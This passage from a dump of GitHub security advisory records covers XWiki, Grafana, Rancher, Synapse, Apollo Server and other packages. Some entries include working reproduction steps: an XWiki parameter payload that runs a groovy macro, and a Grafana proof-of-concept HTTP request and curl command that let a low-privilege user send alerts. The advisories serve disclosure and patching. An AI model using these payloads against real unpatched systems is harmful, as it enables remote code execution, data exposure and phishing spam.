otherwise doesn't matter) * Set ""Extension Parameters"" to ``` tip={{async async=""true"" cached=""false"" context=""doc.reference""}}{{groovy}}println(""Hello "" + ""from groovy!""){{/groovy}}{{/async}} ``` * Set ""Extension Scope"" to ""Current User"". * Click ""Save & View"" * Open the ""Help.TipsPanel"" document at /xwiki/bin/view/Help/TipsPanel where is the URL of your XWiki installation and press refresh repeatedly. The groovy macro is executed, after the fix you get an error instead. ### Patches This has been patched in XWiki 15.1-rc-1 and 14.10.5. ### Workarounds There are no known workarounds for it. ### References * https://jira.xwiki.org/browse/XWIKI-20281 * https://github.com/xwiki/xwiki-platform/commit/98208c5bb1e8cdf3ff1ac35d8b3d1cb3c28b3263#diff-4e3467d2ef3871a68b2f910e67cf84531751b32e0126321be83c0f1ed5d90b29L176-R178 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-help-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.1-milestone-1'}, {'fixed': '14.10.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-help-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.1-rc-1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h7cw-44vp-jq7h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35166'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/98208c5bb1e8cdf3ff1ac35d8b3d1cb3c28b3263#diff-4e3467d2ef3871a68b2f910e67cf84531751b32e0126321be83c0f1ed5d90b29L176-R178'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20281'}]","{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-20T19:55:36Z', 'nvd_published_at': None}" 1.4.0,GHSA-68jh-rf6x-836f,2023-06-20T19:50:40Z,2023-06-16T19:40:53Z,,[],@apollo/server vulnerable to unsafe application of Content Security Policy via reused nonces,"### Context Content Security Policies (CSP) are a defense-in-depth strategy against XSS attacks. Improper application of CSP isn't itself a vulnerability, but it does fail to prevent XSS in the event that there is a viable attack vector for an XSS attack. ### Impact There aren't any XSS attack vectors via the Apollo Server landing pages _known to Apollo_, so to our knowledge there is no impact. However, if there are existing XSS vectors that haven't been reported and patched, then all users of Apollo Server's landing pages have a vulnerability which won't be prevented by the current CSP implemented by the landing pages. Prior to version 4.7.1, there was no CSP implemented at all. However, the initial CSP implementation (4.7.1+) reused nonces. While this sufficiently resolved the issue w.r.t. scripts not running in Safari, it did not implement CSP in a safe or conventional way. ### Patches The issue is patched in the latest version of Apollo Server, v4.7.4. The changes can be reviewed in [the merge commit](https://github.com/apollographql/apollo-server/commit/0adaf80d1ee51d8c7e5fd863c04478536d15eb8c). ### Workarounds The landing page can be disabled completely until the patch can be upgraded to. https://www.apollographql.com/docs/apollo-server/api/plugin/landing-pages/#disabling-the-landing-page ### References https://content-security-policy.com/nonce/",[],"[{'package': {'ecosystem': 'npm', 'name': '@apollo/server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.7.1'}, {'fixed': '4.7.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/apollographql/apollo-server/security/advisories/GHSA-68jh-rf6x-836f'}, {'type': 'WEB', 'url': 'https://github.com/apollographql/apollo-server/commit/0adaf80d1ee51d8c7e5fd863c04478536d15eb8c'}, {'type': 'PACKAGE', 'url': 'https://github.com/apollographql/apollo-server'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-16T19:40:53Z', 'nvd_published_at': None}" 1.4.0,GHSA-8g9c-c9cm-9c56,2023-06-20T16:46:29Z,2023-06-20T16:46:29Z,,['CVE-2023-35151'],XWiki Platform may show email addresses in clear in REST results,"### Impact Any user can call a REST endpoint and obtain the obfuscated passwords (even when the mail obfuscation is activated). For instance, by calling http://localhost:8080/xwiki/rest/wikis/xwiki/spaces/XWiki/pages/U1/objects/XWiki.XWikiUsers/0 when user `U1` exists on wiki `xwiki`. ### Patches The issue has been patched on XWiki 14.4.8, 14.10.6, and 15.1 ### Workarounds There is no known workaround. It is advised to upgrade to one of the patched versions. ### References - https://jira.xwiki.org/browse/XWIKI-16138 - https://github.com/xwiki/xwiki-platform/commit/824cd742ecf5439971247da11bfe7e0ad2b10ede ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-rest-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.3-milestone-1'}, {'fixed': '14.4.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-rest-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-rest-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-8g9c-c9cm-9c56'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35151'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/824cd742ecf5439971247da11bfe7e0ad2b10ede'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-16138'}]","{'cwe_ids': ['CWE-359', 'CWE-668'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-20T16:46:29Z', 'nvd_published_at': None}" 1.4.0,GHSA-7f2f-pcv3-j2r7,2023-06-20T16:45:12Z,2023-06-20T16:45:12Z,,['CVE-2023-34466'],XWiki Platform's tags on non-viewable pages can be revealed to users,"### Impact Tags from pages not viewable to the current user are leaked by the tags API. This information can also be exploited to infer the document reference of non-viewable pages. ### Patches This vulnerability has been patched in XWiki 14.4.8, 14.10.4, and 15.0 RC1. ### Workarounds There is no workaround apart from upgrading to a fixed version. ### References - https://jira.xwiki.org/browse/XWIKI-20002 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-tag-api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0-milestone-1'}, {'fixed': '14.4.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-tag-api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-7f2f-pcv3-j2r7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34466'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20002'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-20T16:45:12Z', 'nvd_published_at': None}" 1.4.0,GHSA-5f9v-mv5g-jh5q,2023-06-22T20:01:11Z,2023-06-22T20:01:11Z,,['CVE-2023-25499'],Vaadin vulnerable to possible information disclosure in non visible components.,"### Description When adding non-visible components to the UI in server side, content is sent to the browser in Vaadin 10.0.0 through 10.0.22, 11.0.0 through 14.10.0, 15.0.0 through 22.0.28, 23.0.0 through 23.3.12, 24.0.0 through 24.0.5 and 24.1.0.alpha1 to 24.1.0.beta1, resulting in potential information disclosure. * https://vaadin.com/security/cve-2023-25499","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.0.23'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '14.10.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '23.0.0'}, {'fixed': '23.3.13'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '24.0.0'}, {'fixed': '24.0.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '24.1.0.alpha1'}, {'fixed': '24.1.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.20'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '2.8.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '9.1.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '23.0.0'}, {'fixed': '23.3.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '24.0.0'}, {'fixed': '24.0.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '24.1.0.alpha1'}, {'fixed': '24.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/platform/security/advisories/GHSA-5f9v-mv5g-jh5q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25499'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/15885'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/platform'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/CVE-2023-25499'}]","{'cwe_ids': ['CWE-200', 'CWE-201'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T20:01:11Z', 'nvd_published_at': None}" 1.4.0,GHSA-8vhc-hwhc-cpj4,2023-06-06T01:59:31Z,2023-06-06T01:59:31Z,,['CVE-2020-10676'],Rancher users retain access after moving namespaces into projects they don't have access to,"### Impact A vulnerability was identified in which users with update privileges on a namespace, can move that namespace into a project they don't have access to. After the namespace transfer is completed, their previous permissions are still preserved, which enables them to gain access to project-specific resources (such as [project secrets](https://ranchermanager.docs.rancher.com/how-to-guides/new-user-guides/kubernetes-resources-setup/secrets#creating-secrets-in-projects)). In addition, resources in the namespace will now count toward the [quota limit](https://ranchermanager.docs.rancher.com/how-to-guides/advanced-user-guides/manage-projects/manage-project-resource-quotas/about-project-resource-quotas) of the new project, potentially causing availability issues. User with roles `Project Owner` and `Project Member` on the source project can exploit this vulnerability; however, this would also apply to custom roles with similar privileges. The patched version include an improved RBAC mechanism, which checks if the user has the correct permissions before the namespace move takes place. ### Patches Patched versions include releases `2.6.13`, `2.7.4` and later versions. ### Workarounds There is no direct mitigation besides updating Rancher to a patched version. ### For more information If you have any questions or comments about this advisory: - Reach out to the [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security related inquiries. - Open an issue in the [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository. - Verify with our [support matrix](https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/rancher/rancher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.13'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/rancher/rancher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rancher/rancher/security/advisories/GHSA-8vhc-hwhc-cpj4'}, {'type': 'PACKAGE', 'url': 'https://github.com/rancher/rancher'}, {'type': 'WEB', 'url': 'https://github.com/rancher/rancher/releases/tag/v2.6.13'}, {'type': 'WEB', 'url': 'https://github.com/rancher/rancher/releases/tag/v2.7.4'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T01:59:31Z', 'nvd_published_at': None}" 1.4.0,GHSA-26c5-ppr8-f33p,2023-06-07T13:50:03Z,2023-06-06T16:40:42Z,,['CVE-2023-32682'],Synapse has improper checks for deactivated users during login,"### Impact It may be possible for a deactivated user to login when using uncommon configurations. This only applies if any of the following are true: * [JSON Web Tokens are enabled for login](https://matrix-org.github.io/synapse/latest/jwt.html) via the `jwt_config.enabled` configuration setting * The [local password database is enabled](https://matrix-org.github.io/synapse/latest/usage/configuration/config_documentation.html#password_config) via the `password_config.enabled` and `password_config.localdb_enabled` configuration settings *and* a user's password is [updated via an admin API](https://matrix-org.github.io/synapse/latest/admin_api/user_admin_api.html#create-or-modify-account) after a user is deactivated. **Note that the local password database is enabled by default**, but it is uncommon to set a user's password after they've been deactivated. Installations that are configured to only allow login via Single Sign-On (SSO) via CAS, SAML or OpenID Connect (OIDC); or via an external password provider (e.g. LDAP) are not affected. ### Patches * If using JSON Web Token logins: #15624 * For other users: #15634 ### Workarounds If not using JSON Web Tokens, ensure that deactivated users do not have a password set. This list of users can be queried from PostgreSQL: ```sql SELECT name FROM users WHERE password_hash IS NOT NULL AND deactivated = 1; ``` ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.85.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-26c5-ppr8-f33p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32682'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/issues/12274'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/15624'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/15634'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/releases/tag/v1.85.0'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/matrix-synapse/PYSEC-2023-84.yaml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X6DH5A5YEB5LRIPP32OUW25FCGZFCZU2/'}, {'type': 'WEB', 'url': 'https://matrix-org.github.io/synapse/latest/admin_api/user_admin_api.html#create-or-modify-account'}, {'type': 'WEB', 'url': 'https://matrix-org.github.io/synapse/latest/jwt.html'}, {'type': 'WEB', 'url': 'https://matrix-org.github.io/synapse/latest/usage/configuration/config_documentation.html#password_config'}]","{'cwe_ids': ['CWE-287'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T16:40:42Z', 'nvd_published_at': None}" 1.4.0,GHSA-8q9q-r9v2-644m,2023-06-30T20:42:07Z,2023-06-30T20:42:07Z,,['CVE-2023-36468'],Upgrading doesn't prevent exploiting vulnerable XWiki documents,"### Impact When an XWiki installation is upgraded and that upgrade contains a fix for a bug in a document, just a new version of that document is added. In some cases, it's still possible to exploit the vulnerability that was fixed in the new version. The severity of this depends on the fixed vulnerability, for the purpose of this advisory take [CVE-2022-36100](https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-2g5c-228j-p52x) as example - it is easily exploitable with just view rights and critical. When XWiki is upgraded from a version before the fix for it (e.g., 14.3) to a version including the fix (e.g., 14.4), the vulnerability can still be reproduced by adding `rev=1.1` to the URL used in the reproduction steps so remote code execution is possible even after upgrading. Therefore, this affects the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability also affects manually added script macros that contained security vulnerabilities that were later fixed by changing the script macro without deleting the versions with the security vulnerability from the history. This vulnerability doesn't affect freshly installed versions of XWiki. Further, this vulnerability doesn't affect content that is only loaded from the current version of a document like the code of wiki macros or UI extensions. ### Patches This vulnerability has been patched in XWiki 14.10.7 and 15.2RC1 by forcing old revisions to be executed in a restricted mode that disables all script macros. ### Workarounds As a workaround, admins can manually delete old revisions of affected documents. A script could be used to identify all installed documents and delete the history for them. However, also manually added and later corrected code may be affected by this vulnerability so it is easy to miss documents. ### References * https://jira.xwiki.org/browse/XWIKI-20594 * https://github.com/xwiki/xwiki-platform/commit/15a6f845d8206b0ae97f37aa092ca43d4f9d6e59","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-oldcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0'}, {'fixed': '14.10.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-oldcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.2-rc-1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-2g5c-228j-p52x'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-8q9q-r9v2-644m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36468'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/15a6f845d8206b0ae97f37aa092ca43d4f9d6e59'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20594'}]","{'cwe_ids': ['CWE-459'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:42:07Z', 'nvd_published_at': None}" 1.4.0,GHSA-cvm3-pp2j-chr3,2023-06-12T20:09:27Z,2023-06-12T20:09:27Z,,['CVE-2023-2183'],Grafana has Broken Access Control in Alert manager: Viewer can send test alerts,"### Summary Grafana allows an attacker in the Viewer role, send alerts by API Alert - Test. The option is not available from the user panel UI for in the Viewer role. **Reason for the error**: The API does not check access to this function and allows it by users with the least rights, for example, the Viewer that does not see this option in the user panel. This enables malicious users to abuse the functionality by sending multiple alert messages (e-mail, slack, etc…), spamming users, prepare Phishing attack or blocked SMTP server / IP and automatically moved all message to spam folder, add to black list IP. ### Details The logged-in user, in the Viewer role, in the user panel, does not have access to the test option of sending an e-mail alert. View of the panel for the user in the Viewer role: ![image](https://user-images.githubusercontent.com/1643385/232904030-e8a8338d-f5e3-4b04-80c3-32f2164a190e.png) Admin role - View panel for admin role: ![image](https://user-images.githubusercontent.com/1643385/232904264-c7aba0a5-0642-496b-998d-d500eb5ead7f.png) Admin role - Next step – editing: ![image](https://user-images.githubusercontent.com/1643385/232904388-ef2ee69e-3ee3-41a9-8687-305886c5c0b9.png) Admin role - Additional options: ![image](https://user-images.githubusercontent.com/1643385/232904480-dd493d34-d66d-47af-ab4f-3273ae8976bc.png) ### PoC **HTTP Request by user in role Viewer** ``` POST /api/alertmanager/grafana/config/api/v1/receivers/test HTTP/1.1 Host: xxx Cookie: grafana_session=xxx Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://xxx/alerting/notifications/receivers/grafana-default-email/edit?alertmanager=grafana accept: application/json, text/plain, */* content-type: application/json … {""receivers"":[{""name"":""test"",""grafana_managed_receiver_configs"":[{""settings"":{""addresses"":"""", ""singleEmail"":true},""secureSettings"":{},""type"":""email"",""name"":""test"",""disableResolveMessage"":false}]}], ""alert"":{""annotations"":{""runbook_url"":""http://example.com "",""description"":""tekst"",""testowy"":""test http://example.com"", ""more"":""http://example.com ""},""labels"":{}}} ``` **HTTP Response:** ``` HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: application/json Expires: -1 Pragma: no-cache X-Content-Type-Options: nosniff X-Frame-Options: deny X-Xss-Protection: 1; mode=block Date: Wed, 05 Apr 2023 10:43:00 GMT Content-Length: 471 {""alert"":{""annotations"":{""__value_string__"":""[ metric='foo' labels={instance=bar} value=10 ]"",""description"":""tekst"", ""more"":""http://example.com"",""runbook_url"":""http://example.com"",""summary"":""Notification test"", ""testowy"":""testowy http://example.com""},""labels"":{""alertname"":""TestAlert"",""instance"":""Grafana""}}, ""receivers"":[{""name"":""test"",""grafana_managed_receiver_configs"":[{""name"":""test"",""uid"":""ojUhNFL4k"",""status"":""ok""}]}], ""notified_at"":""2023-04-05T12:43:00.1430203+02:00""} ``` ## Result: The attacker can send as a template alert or plain/text. ![image](https://user-images.githubusercontent.com/1643385/232917993-1294cfe0-3040-4d04-a533-a72ecbc666c0.png) ### Impact As I showed above, an enabled user in the lowest role can execute an endpoint API that allows him to send an e-mail as an alert and impersonate its content. If modified accordingly, the recipient may fall victim to a Phishing attack or a targeted attack to block the SMTP server. From a practical point of view, this means that for each ""GrafanaReceiver"" e.g.: Slack, E-mail, etc.. You can send any alert message from user with the least privileged. CURL example – using a user session in the Viewer role: ``` curl -i -s -k -X $'POST' \ -H $'Host: localhost:3002' -H $'Content-Length: 386' -H $'sec-ch-ua: \""Not:A-Brand\"";v=\""99\"", \""Chromium\"";v=\""112\""' -H $'accept: application/json, text/plain, */*' -H $'content-type: application/json' -H $'x-grafana-org-id: 1' -H $'sec-ch-ua-mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/527.36 (KHTML, like Gecko) Chrome/112.0.2615.50 Safari/11.36' -H $'sec-ch-ua-platform: \""macOS\""' -H $'Origin: http://localhost:3002' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Referer: http://localhost:3002/' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' -H $'Connection: close' \ -b $'grafana_session=xxx' \ --data-binary $'{\""receivers\"":[{\""name\"":\""test\"",\""grafana_managed_receiver_configs\"":[{\""settings\"":{\""addresses\"":\""\"",\""singleEmail\"":true\x0d\x0a},\""secureSettings\"":{},\""type\"":\""email\"",\""name\"":\""test\"",\""disableResolveMessage\"":false}]}],\""alert\"":{\""annotations\"":{\""runbook_url\"":\""http://example.com\"",\""description\"":\""tekst\"",\""testowy\"":\""testowy http://example.com\"",\x0d\x0a\""more\"":\""http://example.com\""\x0d\x0a},\""labels\"":{}}}\x0d\x0a' \ $'http://localhost:3002/api/alertmanager/grafana/config/api/v1/receivers/test' ``` ### Mitigation 1. In the SMTP server configuration settings, limit the ability to send multiple e-mails to the same e-mail address per unit of time / threshold. 2. Check the API for the possibility of accessing this endpoint for other roles than admin ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.26'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.2.19'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.3.0'}, {'fixed': '9.3.15'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.4.0'}, {'fixed': '9.4.12'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.5.0'}, {'fixed': '9.5.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2183'}, {'type': 'PACKAGE', 'url': 'https://github.com/grafana/bugbounty'}, {'type': 'WEB', 'url': 'https://grafana.com/security/security-advisories/cve-2023-2183/'}]","{'cwe_ids': ['CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-12T20:09:27Z', 'nvd_published_at': None}" 1.4.0,GHSA-m4mv-rmr7-h5f5,2023-06-06T01:39:48Z,2023-06-06T01:39:48Z,,['CVE-2023-2983'],Pimcore Privilege Defined With Unsafe Actions vulnerability,"### Impact A new user can privilege escalation to admin role which least config ### Patches Update to version 10.5.23 or apply this patches manually https://github.com/pimcore/pimcore/commit/c8f37b19c99cd82e4e558857d3e4d5476ea7228a.patch ### Workarounds Apply patches manually: https://github.com/pimcore/pimcore/commit/c8f37b19c99cd82e4e558857d3e4d5476ea7228a.patch ### References https://huntr.dev/bounties/6b2f33d3-2fd0-4d2d-ad7b-2c1e2417eeb1/ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.23'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-m4mv-rmr7-h5f5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2983'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/c8f37b19c99cd82e4e558857d3e4d5476ea7228a'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/6b2f33d3-2fd0-4d2d-ad7b-2c1e2417eeb1'}]","{'cwe_ids': ['CWE-267'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T01:39:48Z', 'nvd_published_at': None}" 1.4.0,GHSA-p7xm-g427-jxfc,2023-06-16T17:46:56Z,2023-06-10T09:30:16Z,,['CVE-2023-3190'],Teampass Cross-site Scripting vulnerability,In versions of nilsteampassnet/teampass prior to 3.0.9 some user input was not properly sanitized which may have lead to stored cross-site scripting (XSS) vectors in the application.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'nilsteampassnet/teampass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3190'}, {'type': 'WEB', 'url': 'https://github.com/nilsteampassnet/teampass/commit/241dbd4159a5d63b55af426464d30dbb53925705'}, {'type': 'PACKAGE', 'url': 'https://github.com/nilsteampassnet/teampass'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/5562c4c4-0475-448f-a451-7c4666bc7180'}]","{'cwe_ids': ['CWE-116'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-12T18:00:25Z', 'nvd_published_at': None}" 1.4.0,GHSA-vv6q-6hwp-vrgp,2023-07-07T16:30:07Z,2023-06-29T21:30:29Z,,['CVE-2020-26710'],easy-parse XML External Entity Injection vulnerability,easy-parse v0.1.1 was discovered to contain a XML External Entity Injection (XXE) vulnerability which allows 